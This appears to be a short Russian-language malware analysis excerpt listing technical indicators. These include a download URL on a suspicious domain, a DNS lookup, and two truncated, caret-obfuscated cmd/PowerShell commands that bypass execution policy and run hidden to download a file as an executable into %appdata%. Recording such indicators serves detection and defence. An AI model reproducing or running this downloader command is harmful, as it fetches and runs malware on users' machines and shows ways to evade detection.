Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^WeR^s^hell.e^X^E -eXEcUTIoNPOLicY Byp^Ass^ -no^pRo^FIlE^ -Window^StYle ^HiDDEn (^Ne^w-O^b^Jec^t Sys^TEm.ne^t^.WebC^lI^eNT^)^.DOWnLOAd^F^ILE(^'http://mondayhelthc.top/re...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "p^O^WeR^s^hell.e^X^E -eXEcUTIoNPOLicY Byp^Ass^ -no^pRo^FIlE^ -Window^StYle ^HiDDEn (^Ne^w-O^b^Jec^t Sys^TEm.ne^t^.WebC^lI^eNT^)^.DOWnLOAd^F^ILE(^'http://mondayhelthc.top/re...' (со скрытым окном)